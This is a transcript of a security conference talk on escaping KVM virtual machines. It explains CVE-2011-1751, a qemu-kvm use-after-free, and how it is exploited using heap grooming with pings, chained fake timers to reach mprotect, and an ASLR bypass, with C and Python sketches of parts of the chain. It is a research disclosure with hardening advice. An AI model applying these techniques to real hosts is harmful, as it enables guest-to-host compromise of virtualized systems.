All right, hi everybody. I'm going to be giving a talk entitled "Virtunoid: Breaking out of KVM," the Linux Kernel Virtual Machine. So what exactly is this KVM thing, and why do I care about it? KVM is sort of the new hotness for virtualization on Linux. It's a virtualization system that was developed more or less from scratch to be the officially supported, upstream-friendly virtualization solution for the Linux community. It started later than Xen and everyone else, but it has been ramping up speed and has become the officially blessed platform for a lot of distributions to do virtualization. So it's an exciting new platform that I think is going to be seeing a lot of attention in the security space soon, and I decided to take a look at it, come to some conclusions, and share my results here. So who am I, and why am I talking to you? My day job actually has absolutely nothing to do with this. I'm a kernel engineer at a company called Ksplice, but that does mean I spend a lot of time staring at low-level software systems, and so in my spare time I tend to do a lot of low-level security stuff, including this work on KVM. All right, so, the structure of this talk. We're going to start by taking a high-level look at KVM. We'll look at what the different pieces are and how they fit together, and then we'll go back and focus in on each of them from an attack-surface perspective: for an attacker trying to break out of a KVM virtual machine, what's interesting about each of the components? How are they exposed to the attacker? What kinds of things should we be thinking about and looking for? Then we'll launch into a deep technical dive into the guts of actually writing a breakout exploit against KVM, learning in the process about some useful features of the KVM architecture that come in handy and that we can exploit in creative ways.
We'll start by looking at the bug that my exploit centers around, and then we'll talk about the actual exploit that I wrote. Then I'll discuss some conclusions that I think are implied or suggested by my work, and some future directions that I hope to proceed in, or that I would love to see other people work on. And then we'll demo the exploit, because no talk on exploitation is complete without an on-stage demo to potentially screw up hilariously. It's been reliable so far. All right, so KVM: how does it work? There are three main components to the KVM virtual machine. There's kvm.ko, the core kernel module; there's a pair of kernel modules supporting the Intel and AMD hardware extensions; and then there's a userspace driver program, qemu-kvm. Looking a little at the function of each of those and where they sit: kvm.ko is the core of the kernel-side support for KVM. It's responsible for emulating and tracking the virtual CPU and memory management unit — the core of the virtual machine — using AMD's and Intel's x86 hardware virtualization extensions. It emulates a small number of devices and input/output operations in-kernel directly for efficiency, but for the most part it doesn't deal with emulating hardware. It also provides a large interface for a userspace driver program like qemu-kvm, which we'll talk about in a second, to communicate with it: to allocate new virtual machines, allocate new virtual CPUs on those machines, set up the emulated physical memory, and all of that. One of my favorite bits of trivia about kvm.ko is that despite the fact that we're using hardware virtualization extensions here — which means that for the most part the virtual machine is just executed directly by the processor, in "VMX non-root" context, as Intel calls it — KVM still contains an entire x86 emulator in the kernel module that's used for handling certain rare traps.
And just from a code-complexity and attack-surface perspective, that's an interesting thing to know. kvm-intel.ko and kvm-amd.ko are the other half — really much less than half — of the kernel component here. They just provide the glue code for communicating with the hardware virtualization extensions. More or less, you take those four chapters or whatever from the Intel manuals, implement the software half of that, and you get these. They're relatively small — one C file, 4,000 lines or so each — which, compared to any of the other components, is tiny. And then finally we come to the userspace component, qemu-kvm, which is the direct user interface and userspace driver for KVM VMs. It's based on the classic QEMU emulator, which I'm sure almost all of you have heard of and probably even used, because it's amazingly useful and handy. In addition to providing the interface and the driver loop, qemu-kvm implements basically all of the virtual devices that your VM talks to, because a virtual machine, much like a real machine, is not just a CPU talking to a block of memory. For it to be useful there need to be peripheral devices: PCI buses that hang off all kinds of devices, your ethernet card, your display, a serial console, a timer device of some sort — all of that lives in qemu-kvm, and it's responsible for emulating those devices. And devices are complicated, it turns out, so this component contains a huge quantity of code. It's an order of magnitude more code than kvm.ko, even if you only consider the devices that are actually in use by a typical VM; if you consider all of the possible devices, it's even bigger. There's currently a project underway in the upstream Linux community to potentially replace this userspace component with a separate, developed-more-or-less-from-scratch binary that would be maintained in the Linux kernel tree.
But that work is relatively new — it's not more than a year or two old — and it's going to be some years before it's stable enough that people are seriously using it, and then some more years before distributions are actually shipping it and lots of people are using it in production. So if we're thinking about attacking or defending KVM for the near future, qemu-kvm is what we need to be talking about. All right, so those are the three main components. Now we can go back and take a look at each one with an eye for attack surface. kvm.ko, for an attacker, is a very tempting target because it runs in kernel mode on the host, in ring zero. If I successfully find and exploit a bug here, I have ultimate privileges on the host with no further exploitation or privilege escalation needed. However, despite being a tempting target, it's also a bit of a tough target, because there's not very much code there compared to the userspace component, and much of the code that is there is dedicated to interfacing with the userspace component, so it's not directly reachable by a guest. That x86 emulator I mentioned is definitely an interesting target, because there's a lot of code there that is rarely exercised — the emulator is only used in some edge cases — and whenever I'm auditing a system, lots of subtle code that's rarely used is the first place I look for bugs. There have been a number of interesting bugs there that allowed privilege escalation within a guest because of bugs in the x86 emulator. So there is a bit of a track record of bugs. Those aren't as interesting as breakout bugs, but again, it's a hint that this is an interesting place to look. It's unfortunately not the focus of this talk, but it's something I want to highlight because I think future research should take a close look here.
And then in addition to privilege escalation within the guest, while we're talking about kvm.ko, we should keep in mind that there's also the possibility of privilege escalation on the host, because unprivileged users can communicate with this privileged kernel module. Just another thing to note if we're looking at the whole scope of KVM exploitation. kvm-intel.ko and kvm-amd.ko, the kernel modules that interface with the hardware, are not super interesting targets because there isn't a ton of code there. It's mostly straight-line code that just translates between the kernel's data structures that represent the VM and how the hardware wants to model those, bridging back and forth. But there's a lot of subtlety and complexity in interacting with these hardware features, and so there's potentially scope for some interesting bugs where KVM is using the hardware support slightly incorrectly, or in an unusual way that allows for interesting attacks. But it's not the first place I'd look. And then finally we come again to qemu-kvm, which, as you can probably guess by now, is the easiest place to look for targets. Hundreds of thousands of lines of code, emulating devices that talk directly to the guest via emulated memory-mapped I/O or I/O ports — so they're parsing control structures that the guest is exporting and speaking these strange, arcane hardware protocols. Lots of interesting code. And much of this code comes straight from QEMU, which is mostly written by one guy, Fabrice Bellard, who is an absolutely brilliant programmer — but it's just one guy spewing out code over years with no one auditing it, and bugs are going to happen. The one unfortunate thing here, for us as attackers, is that it is often sandboxed using SELinux or AppArmor or some other technology.
And so if we do successfully break out from KVM into qemu-kvm and get code execution in that process, we'll probably need another privilege escalation attack to get full privileges on the host. Fortunately, we're all running Linux, which, as any Slashdot reader knows, has no bugs whatsoever, so we should be safe. All right. So that's the structure of KVM and a bit of a look at the attack surface. Now we're going to dive in on our bug — the bug that I use — which is in fact a bug in qemu-kvm, in that userspace driver program. I've got here the text from the Red Hat security advisory; the bug is CVE-2011-1751, and all the major distributions have patched it by now, so you can go look it up. Red Hat describes it as: "It was found that the PIIX4 Power Management emulation layer did not properly check for hot plug eligibility." So what does that mean? First off, what is the PIIX4? The PIIX4 was an actual physical chip that was the southbridge in most circa-2000 Intel chipsets. Being the southbridge means that most of the physical devices in computers of that era hung off of it architecturally: the PCI bus, the ACPI support, the real-time clock — all of that stuff the CPU communicates with through the southbridge. And this is the default southbridge chip that QEMU emulates. It supports a PCI bus, and it supports PCI hotplug. On physical hardware, what that would mean is that to hot-unplug a device, the chip instructs the PCI bus to electrically disconnect it so that you can pull it out safely. In a virtual machine, what it means is that we disconnect the virtual mappings for that device's I/O ports and free the memory backing the device. It's expected that the destructor function for a virtual device performs this unplugging cleanly. But not every device in QEMU was implemented under the expectation that it might be hot-unplugged.
And so some of these destructor functions are no-ops, or insufficiently clean up state. That's supposed to be okay, because you're not supposed to be able to hot-unplug those devices, so it's fine if they don't clean themselves up completely. But it turns out that, as the advisory says, there were insufficient checks for hotplug eligibility: the PIIX4 PCI hotplug path, if you handed it an identifier for a device on the PCI bus to unplug, would just blindly go and unplug it, without actually checking the flag that says "this is a hot-pluggable device." In particular, a tempting target is the emulated ISA bridge. So, who here actually remembers physical ISA cards and ISA buses? All right, most of us. We don't have those anymore, at least outside of hobbyist, archaic-hardware shows. But it turns out that your southbridge, even in modern Intel chipsets, has an ISA bus with ISA devices hanging off of it. And QEMU faithfully emulates this behavior and has a bunch of virtual ISA devices hanging off of a PCI-ISA bridge. We can just unplug that bridge, and all of those ISA devices — which include such things as the real-time clock that keeps calendar time on the virtual machine — just go away. And that real-time clock, it turns out, is not expecting to be unplugged. In particular — it's a real-time clock, so it has timer events that it uses to keep track of the time — it leaves those timers hanging around on QEMU's run loop. So let's look a little at what this means in code. The real-time clock is emulated by this struct RTCState at the bottom of the screen, and it has this second timer that it schedules to fire every second so that it can update the time. And if we look up above at how a QEMUTimer works, it just has an expire time that says when the timer should fire.
Then it has a callback, and an opaque pointer that is passed to that callback. So once a second, the QEMU timer fires and calls this rtc_update_second function on that RTCState struct. But if we eject the device, it frees the RTCState structure — yet it doesn't free or unregister either of the timers it used; I've only shown the one that's relevant for this exploit. And so we're left with dangling pointers. That opaque pointer is actually used as a pointer to the RTCState, so we have a dangling pointer to a freed object, and within a second, on the next second tick, we call this rtc_update_second function on a freed object. We have a classic use-after-free bug. As those of you who are exploit developers probably know, that's almost the most beautiful case you could hope for in an exploitable bug — a use-after-free like that. And just to show how easy this is to reproduce: that's the reproducer. Compile that program, run it as root on a Linux machine with a vulnerable version of KVM, and KVM will segfault. All this does is call iopl() to get privileges to write to I/O ports, and then write a single value to a single I/O port — and boom. In fact, this bug was found by a fuzzer that literally wrote random values to random I/O ports; eventually it stumbled on this value and got a SIGSEGV, and I went and debugged it and then wrote this talk. All right. So that's the bug. We have this beautiful use-after-free. But what does it take, in the KVM environment, to go from a use-after-free like this to a working exploit? We'll talk about this process in three stages. First, how do we go from this use-after-free to controlling the instruction pointer — how do we get KVM to jump to some address that we specify? And then, once we have that, how do we leverage it into executing arbitrary shellcode supplied from inside the guest?
Throughout those first two stages, I will have been assuming that I can guess addresses in the qemu-kvm process — i.e., that there's no address space randomization and I can predict addresses. And then we'll talk a little about what we have to do to get rid of that assumption, to work on a process with a randomized address space, which is how KVM will be deployed in the wild on any real system. So, for getting RIP control, the high-level to-do list is fairly straightforward if you look at how the code works. We're going to create a fake QEMUTimer object that we control and inject it at a known address. Then we'll trigger the eject — we'll dump the ISA bridge — and then we'll force an allocation into the space previously occupied by the RTCState structure, one that points that second-timer field at our timer. Then, on the next second boundary, rtc_update_second will run on our fake RTCState, and it will reschedule the second timer to run one second later. But we've hijacked that pointer to point at our timer, and so one second later our timer will run — which means our callback will be invoked, jumping to an address we control. So there are three steps here. I've already shown you how to do number two — how to eject the ISA bridge and actually trigger the vulnerability — which leaves two things to talk about. One: how do we construct fake structures in qemu-kvm's address space? How do we get objects that (a) appear in that address space somewhere, so that we can write pointers to them, and (b) appear at a known address, or let us find that address, so that we can point that second-timer pointer at our thing? This is one case where exploiting a virtual machine actually has a unique advantage over many other types of exploits: that process turns out to be incredibly simple.
The way qemu-kvm handles the emulated RAM for the guest is that it's just a big mmap'd region in qemu-kvm's address space: that is the physical RAM of the guest. So there's actually no injection step at all. We just literally allocate an object however the hell we want — statically, mmap'd, on the stack, whatever we feel like — and find its physical address in the guest, which we can do in a couple of ways: in kernel mode by walking the page tables explicitly, or, it turns out, the kernel exports a proc file that will just give us this information. Either way, clearly we can find that from the guest. Then we just add that physical address to the base address of the mmap in the host process, and we've found our object. For now, we're going to assume that we know the base address of that mmap, because it's predictable assuming no ASLR; again, we'll talk about how to get past that assumption later. So that's step one — injecting data at a controlled address — and it's actually totally easy when you're attacking a virtual machine. And this is true, I believe, of basically all current virtual machines; they do this or something similar, so it's not unique to KVM, although this is the first exploit I'm aware of that's talked about this technique. The second technique is forcing allocations inside the qemu-kvm process. We need to get qemu-kvm to do a malloc of an appropriate size, populated with data we control, that will with high probability get allocated into the space that the struct RTCState used to occupy. To do that, I'm going to use a feature of the qemu-kvm network stack that I'll talk about. qemu-kvm inherits from QEMU a user-mode networking stack that implements an entire virtual LAN inside the qemu-kvm process.
This is used as a way of giving you network access to the guest without having to mess around with bridge devices and tun/tap devices or other such madness on the host, and also without requiring privilege on the part of the qemu-kvm process. It's the default networking setup, so it's a reasonable thing to attack — although in production environments it's probably more common that we'll see bridged networking or something else, and we'd have to modify this step there. But the same fundamental principles of most of the attack would apply. So this virtual network stack emulates a DHCP server and a NAT gateway, all plugged into this virtual LAN. The way this virtual LAN handles packet delivery is that, normally, packets are handled synchronously: when you inject a packet onto the virtual LAN, it just looks up the recipient and calls their deliver-packet callback method synchronously. So there's no buffering, no queuing. But, in order to prevent recursion, if a virtual device or virtual host's deliver mechanism then injects a second packet in response to the first, that packet is queued — using malloc, with a small header added — and delivered later, once we've returned to the main run loop. So if we can find a device on the virtual LAN that responds to packets from the user by synchronously generating a second packet whose contents are all, or almost all, controlled by the contents of the first packet, then that will generate a malloc with controlled contents. Can anyone think of a network service that has that property? Ping — ICMP echo packets. So the way we're actually going to force allocations inside the host is by pinging the virtual gateway. It will reflect the ICMP packets back at us, with a payload of a length we control and contents we control, which will force mallocs and let us exploit this use-after-free.
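As a sketch of the heap-grooming packet, here is how an ICMP echo request with a fully controlled payload might be built. The fake-timer bytes ride in the payload, whose length would be chosen to match the freed RTCState allocation; the identifier/sequence values are arbitrary, and any correspondence to the real exploit's packet layout is an assumption:

```c
#include <stdint.h>
#include <string.h>

/* Standard Internet (ones'-complement) checksum. */
uint16_t cksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)buf[i] << 8 | buf[i + 1];
    if (len & 1)
        sum += (uint32_t)buf[len - 1] << 8;
    while (sum >> 16)                      /* fold carries */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Build an ICMP echo request whose payload we fully control.
 * pkt must hold 8 + payload_len bytes; returns total length. */
size_t build_echo(uint8_t *pkt, const uint8_t *payload, size_t payload_len)
{
    pkt[0] = 8;  pkt[1] = 0;               /* type 8 = echo request */
    pkt[2] = 0;  pkt[3] = 0;               /* checksum, filled below */
    pkt[4] = 0;  pkt[5] = 1;               /* identifier */
    pkt[6] = 0;  pkt[7] = 1;               /* sequence number */
    memcpy(pkt + 8, payload, payload_len); /* attacker-chosen bytes  */
    uint16_t c = cksum(pkt, 8 + payload_len);
    pkt[2] = c >> 8;  pkt[3] = c & 0xff;
    return 8 + payload_len;
}
```

The gateway's synchronous echo reply is what gets queued with malloc, so spraying packets like this at the user-net gateway produces allocations of a size and content we choose. A handy sanity check: re-running cksum over a correctly checksummed packet yields 0.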
And so now, putting the pieces together: we allocate a fake QEMUTimer in our address space, with a callback method pointed at whatever address we want KVM to jump to. We calculate its address in the host using the arithmetic I showed earlier. We do that eject dance, and then we ping the emulated gateway as fast as we can with ICMP packets that contain pointers to our fake timer in the host. With extremely high probability, one of those will end up allocated into the space previously occupied by the RTCState, and we win: we have the ability to get qemu-kvm to jump to an address we control. All right, so that's part one. We have RIP control — we can get QEMU to jump to any address we want — but we still have to deal with non-executable pages, or inject shellcode somehow. We're not quite there yet. So what are our options? We'll start with the classics. We can set RIP = 0x41414141, "AAAA," declare that this clearly demonstrates exploitability, and call it done. That's boring. I could disable NX — non-executable pages — in my BIOS or in my kernel, and just blast shellcode wherever the hell I want and jump to it. That's also boring. Getting more interesting, we could use a technique called return-oriented programming to chain together bits of QEMU's own code to do the standard mmap or mprotect, make our shellcode executable, and then jump into it. That's a standard technique used in most exploits these days, and it would be a perfectly fine strategy here, but I have a slightly different strategy that I stumbled upon and happen to like — I think it has some cleaner properties, and it was easier to develop than a ROP payload — so we'll talk about that. So let's take another look at that QEMUTimer structure that we're faking.
We focused on the callback and opaque members before, but now let's look at this expire time and this next pointer. The way these timers are implemented is that they're stored in a sorted linked list, threaded through by that next pointer. Every time the QEMU main loop wakes up, it runs the timers, which just means walking this linked list by following that next pointer for as long as the expire time is before the current time. And we control that next pointer, because we control the entire timer. So what we can do is construct multiple timers and chain them together via that next pointer, so that we can cause qemu-kvm to execute multiple functions in a row and perform limited strings of computation in the host, rather than just doing one jump. We're going to point those function calls at existing functions inside the host that we string together in an unexpected way. So this is halfway between the traditional return-to-libc attacks and ROP attacks, with a slightly unorthodox method of doing the dispatching. Now, one thing we notice here is that this gives us a large number of one-argument function calls, and we want to make calls with more arguments. To do that, we're going to dive into a detail of how the AMD64 calling convention works. On AMD64 — which I'm assuming throughout — we pass arguments to functions in registers, starting with RDI, RSI, RDX, and so on. So RDI is the first argument; that's what gets the opaque member of our fake timers. RSI we don't directly control. However, every compiled version of qemu_run_timers that I've encountered leaves RSI untouched — it doesn't clobber RSI. So suppose we found a function that looked like this hypothetical set_rsi function: it sets the RSI register based on the RDI register, which is the first-argument register. Going back to our chain of function calls, we set f1 to set_rsi and pass it some argument.
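To make the dispatch concrete, here's a tiny simulation of the idea — not QEMU's actual code. A run_timers-style loop walks an attacker-built list of fake timers; a set_rsi-style gadget stashes one call's argument so the next callback effectively receives two. The struct layout and names mirror the slides but are simplified assumptions:

```c
#include <stdint.h>

/* Simplified stand-in for QEMUTimer: a sorted list threaded by next. */
struct fake_timer {
    int64_t expire_time;
    void (*cb)(void *opaque);
    void *opaque;
    struct fake_timer *next;
};

/* Simulated registers: in the real attack, RDI carries the opaque
 * argument and RSI survives across iterations of qemu_run_timers. */
static uintptr_t rsi;
static uintptr_t last_arg1, last_arg2;

/* set_rsi-style gadget: copies its one argument into "RSI". */
static void set_rsi(void *opaque) { rsi = (uintptr_t)opaque; }

/* A "two-argument" target: picks up its second argument from RSI. */
static void two_arg_target(void *opaque)
{
    last_arg1 = (uintptr_t)opaque;
    last_arg2 = rsi;
}

/* run_timers-style walk: fire callbacks while timers are expired. */
static void run_timers(struct fake_timer *t, int64_t now)
{
    while (t && t->expire_time <= now) {
        struct fake_timer *cur = t;
        t = t->next;                 /* attacker-controlled link */
        cur->cb(cur->opaque);        /* one-argument dispatch    */
    }
}
```

Chaining `set_rsi` before `two_arg_target` in the list lets the second call see both values, exactly the trick described above.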
So then RSI gets populated with that argument — the argument to the first timer — and when we call the second function, we now control both arguments. So we can get to two arguments this way. The same trick doesn't work for RDX, the third-argument register, because qemu_run_timers does clobber that, and so we can't count on it being preserved across timer calls. We'll talk about what we do there in a second. First, this function happens to be the set-RSI gadget that I chose. What it actually does in QEMU is relatively unimportant, but the detail is that it takes a value as its first argument and then calls a function with that value as the second argument — which means it moves it into RSI. So as long as we choose a value of addr that makes that ioport_write a no-op, or a mostly harmless operation, this has the effect of populating RSI from RDI. So that's that. Now, to get to a three-argument mprotect call — because mprotect is what we want to call, to set things executable — we need to call it with an address, a length, and a protection value containing at least PROT_EXEC. A little bit of searching for useful patterns with some grep finds us this interesting function, ioport_readl_thunk. Again, what it's actually supposed to do is totally irrelevant, but it takes two arguments, which we control, and then it follows some function pointers — which we also control — to make a call on an address we control, with a size we control, and with a third argument that just conveniently happens to be equal to PROT_EXEC. So it will set that memory executable. All right. So, to put the steps together: we allocate a fake IORangeOps struct — that's the operations structure — and we set its read op to mprotect.
We allocate an IORange object, which needs to be page-aligned because we're going to call mprotect on it. It has ops pointing at our fake ops, and base set up such that the addr-minus-ioport-base computation yields a useful length. Then we copy our shellcode into that same page, immediately following the IORange. And then we do the timer chain: we call cpu_outl to set the second-argument register to zero, because that happens to be a value that makes the ioport_write up there harmless; then we do this ioport_readl_thunk, which, through a hilarious chain of indirection, results in an mprotect; and then we just jump right into that fake IORange plus one, which is where we stuck our shellcode. All right. And so that works: turn off ASLR, code up all the offsets right, and you've got code execution. So, one question before we jump into getting past ASLR: why didn't I use ROP? Return-oriented programming is a standard, well-understood technique, and the standard way to write these exploits — why do this more creative thing? There are a couple of reasons. One is that this mechanism makes getting the qemu-kvm process to continue executing dead simple, because we're not corrupting the stack. We're not really smashing any state; we're just hijacking the legitimate functionality of the run loop. So after all of this returns, everything — except for the things we freed as a result of our exploit — is in a sane state, and we can just continue executing. Another thing I like about this technique is that I've shown you virtually no assembly on the previous few slides. I've referred to one detail, but there's very little dependence on how these functions actually got compiled. And ROP cares very deeply about how the functions got compiled, because you're chaining together strings of assembly.
When you're exploiting a program on Linux, you have to deal with the fact that every Linux vendor has their own build of the program, with a slightly different source version, a slightly different GCC version, and a slightly different set of flags. So if you have to find ROP gadgets across every single one, it's a fair amount of work, and there aren't yet great tools for doing this in a completely automated fashion on Linux. Whereas here, I just need to look at the source and then grab the symbol table from all of those different builds, and I have all of the addresses I need — because they're just functions that exist in the C code, and so are more or less preserved across compilation by different versions. And finally, the cop-out answer is that I'm just personally not that good at ROP, I don't know great tools for doing it on Linux, and so I decided to try something different. All right, so we've got code execution, but I've been assuming no ASLR. Let's get rid of that restriction. There are fundamentally two addresses that we've been using. One is the base address of the qemu-kvm binary: if we assume we're attacking a known binary, we know the layout of all of the functions in memory, and so we know their offsets from the executable base — but we need to know where that executable is loaded. And second, we need to know the address of that physical-memory mapping inside qemu-kvm, in order to get the addresses of the fake objects we're injecting. So there are a couple of answers here. The classic answer is to find a sufficiently powerful information leak that lets us leak the contents of pointers or of memory, and somehow back-derive these addresses from the leaked information. That's a classic way of doing this. I didn't end up going that way; I decided to do, again, something else that I think is a little more informative and interesting.
The second option is to take advantage of the fact that every major distribution still compiles KVM as non-PIE — not as a position-independent executable. If you're not familiar with the implementation of address space randomization, what this ends up meaning is that the qemu-kvm core ELF binary itself is loaded at a fixed address every time. It's always loaded at the same address, so addresses in the binary itself are not subject to randomization, and we can assume that we know them: for a given binary, we know all of those code addresses. That means the only thing we have left to find is the phys-mem base address. To do that, we're going to use yet another obscure feature of qemu-kvm that comes in handy here: the fw_cfg, or firmware configuration, subsystem. It's sort of a virtual device that emulates two I/O ports. You're not supposed to know or care about it, because it's used by QEMU's BIOS to communicate with the emulated hardware — but it's just listening on I/O ports, and there's no reason other software that's not the BIOS can't talk to it. Its purpose is to export data tables that the BIOS needs, such as the E820 map that describes the layout of physical memory, the ACPI tables that describe how to interface with the emulated ACPI hardware, and so on. It also has support for the BIOS feeding information back to the emulated hardware. This is a little odd, in that, as of the versions I checked, this support for writable tables isn't actually used anywhere in qemu-kvm — there's no place where it exports tables that the BIOS is expected to write. But the infrastructure is there, and not only is it there, it actually lets the BIOS — or any software — write to any of these exported tables. And conveniently, several of these tables are backed by statically allocated buffers inside the host, which means, again assuming no PIE, they're loaded as part of the ELF binary at fixed addresses.
Which means that, since we can write to them, we get nearly 500 bytes of writable data at a fixed, static, predictable address, even under ASLR. That's enough that we can inject our fake timers and fake structures into that space rather than into the backing memory map. There's one complication, which is that mprotect, as I mentioned, needs a page-aligned address, and a 500-byte region is not likely to land on a page-aligned address, since it sits at an essentially arbitrary offset within the binary. So what I did is construct a different set of fake timer chains, using the same techniques, that implements basically a read4 primitive: it reads four bytes from an address we choose in the host process and writes them to a space that's visible to the guest. We use that read4 as an information leak. We build up our own information leak, and we chase pointers using those reads to derive the value of the phys-mem base mapping. Once we've found the address of that mapping, we proceed exactly as before. There's a little added complexity here, in that we now actually do that read4, then do computation based on its result, and then execute more gadgets in the host. So rather than ending our timer chains with next equals NULL, we end them with another timer that calls that rtc_update_second function again, which, remember, follows pointers to find a timer and then schedules that timer one second in the future. So we execute the chain, we do the read4, and one second from now a timer that we control will get executed again; but until then, the host returns to the guest context.
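The pointer-chasing step can be sketched like this in Python. Everything here is invented for illustration (the addresses, the 0x18 field offset, the layout of "host memory"); the real read4 is a timer-gadget chain, and the gluing of two four-byte reads into one 64-bit value is the arithmetic the guest does between chains.

```python
import struct

# Toy "host memory": a static slot points at a heap object, and a
# field inside that object points at the phys-mem mapping. All
# addresses and offsets are made up.
HOST_MEM = {
    0x6A0000: 0x7F1234500000,               # static slot -> heap object
    0x7F1234500000 + 0x18: 0x7F0000000000,  # object+0x18 -> phys-mem base
}

def read4(addr):
    """Stand-in for the timer-chain primitive: leak 4 bytes of host
    memory at `addr` back into guest-visible space."""
    for base, val in HOST_MEM.items():
        if base <= addr < base + 8:
            raw = struct.pack("<Q", val)
            return struct.unpack("<I", raw[addr - base:addr - base + 4])[0]
    raise KeyError(hex(addr))

def read8(addr):
    # Two read4s, glued together by guest-side computation between
    # the one-second-apart timer chains.
    return read4(addr) | (read4(addr + 4) << 32)

obj = read8(0x6A0000)             # chase the static pointer...
physmem_base = read8(obj + 0x18)  # ...then the field inside the object
```

Each `read4` call corresponds to one fired timer chain; the host runs the gadgets, returns to the guest, and a second later the next chain the guest has prepared fires.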
The guest can do arithmetic, do computation, glue bits together based on that read, and one second later we jump back into another set of gadgets. We use this to chain multiple timer chains one after another, with guest execution in between. And that, then, is what it takes, at least in the broad steps that I took, to make this exploit work against ASLR, bypass non-executable pages, and work completely against a stock install of KVM from a vendor, and we'll demo that in just a moment. Before we get to the demo, so that I can end the talk on a high note with the demo, we'll talk about a couple of conclusions, thoughts that I think are raised by this work. One thing I hope this work emphasizes is that virtual machine breakouts aren't magical at all. I think there's often a tendency to treat virtual machines as kind of magic, honestly. They do this weird thing where you get what looks like a whole second copy of the hardware, and they do it with lots of crazy low-level hardware and software tricks. So people tend to assume that attacking virtual machines must be at least as complicated as writing one in the first place, and that therefore they're probably a pretty strong security layer. But that's just not true. All of the usual software protections, ASLR, NX, and so on, apply to virtual machines, but virtual machine breakouts are typically memory corruption bugs like any other bugs, and frankly, today I would rather be attacking a virtual machine than a modern web browser, because the state of exploit mitigation and sandboxing is much more advanced in browsers. So don't think of virtual machines as magic security boxes; they're just as vulnerable as anything else, and, as you might expect, the emulated devices are the weak spot. To drive this point home and give some context, we'll take a brief look at some past virtual machine breakouts.
In 2008, Invisible Things Lab put out the paper "Adventures with a Certain Xen Vulnerability," in which they demonstrated a Xen breakout. The bug they were exploiting was an integer overflow in the paravirtual framebuffer, and they used much the same standard tricks that I did: return-oriented programming to mprotect, to copy a buffer in and then jump into it. Immunity, at Black Hat 2009, presented Cloudburst, a breakout exploit for VMware. Again: missing bounds checks in the virtual SVGA device, get memory corruption, entirely the same techniques. And then, to give a sense of where virtual machines can get interesting, just earlier this year Invisible Things Lab put out another attack against Xen, this one based on a bug in the way Xen uses Intel's VT-d, the IOMMU and hardware I/O-protection technology. It turned out that there was a subtle bug in the way interrupts were handled that actually allowed a guest to escape. That's an example of the kind of thing I said might be possible with the kvm-intel and kvm-amd modules: these things are complicated, and there probably are subtle attacks that involve the hardware interaction. But once again, the actual primitive they got out of that attack was memory corruption in the host, and from there they proceeded with exactly the same set of techniques everyone else uses for exploiting memory corruption bugs. So virtual machines are interesting, but they're not that much more secure than anything else. On to further work that I want to see done, and that I'm going to be pursuing, in hardening KVM. The first takeaway is that you absolutely should be sandboxing qemu-kvm if you're running it in a production environment. Fortunately, if you're running it under at least Ubuntu or Red Hat via libvirt, it is already sandboxed using SELinux or AppArmor.
I haven't yet, but I want to take a look at those sandboxes and see how strong they are. At least this is work that people realize needs to be done. But if any of you are deploying KVM in a remotely sensitive context, make sure you're using a technology that gives you that sandboxing. Another no-brainer: I'd like to see the distributions start building qemu-kvm as PIE, as a fully position-independent executable. The traditional reason not to do this is performance, because on 32-bit x86 building PIE costs you an extra register. But virtually no one is running KVM on 32-bit platforms anymore, and AMD64 has enough registers that the performance impact is really negligible. I haven't benchmarked it on KVM, that's also on my to-do list, but I think it's an obvious change that would improve the state of the world. Then we can try some crazier ideas to make things a little bit harder. There's the standard technique of XOR-encoding sensitive pointers: XOR them with some secret value stored at some address, and un-XOR them when you read them back out, so that if a memory corruption bug tries to clobber them, the attacker basically ends up with a random address. We'd need to do a little more thinking to figure out which things are likely to be targets and might be worth applying this technique to, but it's a standard technique for hardening applications against memory corruption bugs, and I think it's time we start asking that question. We can also try even crazier things, like protecting that guest memory region by lazily mapping or protecting regions of it, or sandboxing individual devices so that each runs in a thread that somehow only has a view into its specific piece of memory. This is a topic I've seen some discussion of on the KVM lists, and one that I hope this work demonstrates has real value. And of course, I want to see more people looking at qemu-kvm, auditing it, and fuzzing it.
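As an illustration of the XOR-encoding idea (in the style of glibc's pointer mangling, not anything qemu-kvm actually does), here's a minimal Python sketch. The secret and addresses are made up; in practice the secret would be random per process.

```python
SECRET = 0xC0FFEE123456789A   # in practice: random, chosen at startup

def mangle(ptr):
    """Encode a function pointer before storing it in memory."""
    return ptr ^ SECRET

def demangle(enc):
    """Decode a stored pointer just before using it."""
    return enc ^ SECRET

fn_ptr = 0x4E2A10                  # made-up code address
stored = mangle(fn_ptr)
assert demangle(stored) == fn_ptr  # legitimate round trip works

# A corruption bug that overwrites the stored slot with a raw target
# address decodes to garbage, since the attacker doesn't know SECRET:
attacker_target = 0x414243444546
assert demangle(attacker_target) != attacker_target
```

The defensive value is exactly the asymmetry shown: honest code round-trips through mangle/demangle, while a blind overwrite lands at an effectively random address.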
Some future research directions on the offensive side: I want to go after kvm.ko, or I'd like to see someone else look into it, because I think there probably are bugs there, and we should understand those bugs and fix them. Another interesting question that I don't know the answer to, and want to: given that I know I'm running in a guest on qemu-kvm, how precisely can I fingerprint the exact qemu-kvm version, by comparing behavior, or possibly by more subtle timing attacks against the memory layout or something? Because I've been assuming that I know which qemu-kvm binary I'm running against. In the wild you can usually assume you're running against a distro's binary, but that's still a range of binaries. So how well we can fingerprint will give us an understanding of how weaponizable these attacks really are, and how general such exploits can be. And then another question is: what do information leaks in qemu-kvm look like? Assuming we get things built fully randomized, we're going to start wanting information leaks to extract addresses in order to write these kinds of exploits. Is there a whole class of information leaks that we haven't noticed yet, whole classes where the standard idioms QEMU uses have a tendency to leak addresses in a way we hadn't realized? Analogous to Dan Rosenberg's work on the Linux kernel, where he demonstrated that a leak of uninitialized memory as small as four bytes can, with a bunch of cleverness, reliably be used to deduce kernel addresses. So that's my immediate checklist of future work on KVM. I also hope to improve my fuzzer and point it at other virtual machines as well. For KVM this is my checklist, and if you're interested in any of these, I encourage you to talk to me and share whatever thoughts you have. So finally, after all of that talking at you, it's time to demo my exploit in action.
